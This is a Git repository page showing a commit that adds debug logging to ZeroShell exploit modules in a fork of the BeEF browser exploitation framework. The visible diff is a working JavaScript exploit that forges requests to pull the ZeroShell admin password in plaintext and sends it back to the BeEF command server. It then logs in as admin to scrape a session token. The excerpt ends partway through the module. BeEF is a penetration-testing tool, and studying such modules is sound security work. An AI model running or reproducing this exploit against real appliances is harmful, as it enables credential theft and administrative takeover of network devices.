Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add some beef.debug() in all ZeroShell's modules

Browse Source
This commit is contained in:
Yann CAM
2016-10-06 13:47:19 +02:00
parent 528e00bf6e
commit f8afc3e326
8 changed files with 12 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js
View File

@@ -14,10 +14,12 @@ beef.execute(function() {
var pwd = "";
var token = "";
beef.debug("[ZeroShell_2.0RC2_admin_dynamic_token] Trying to retrieve admin password in plaintext: " + uripwd);
beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
if(response1.status_code == 200){
pwd = response1.response_body.trim();
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
beef.debug("[ZeroShell_2.0RC2_admin_dynamic_token] Trying to authenticate admin user to gain dynamic token with password: " + pwd);
beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
if(response2.status_code == 200){
token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);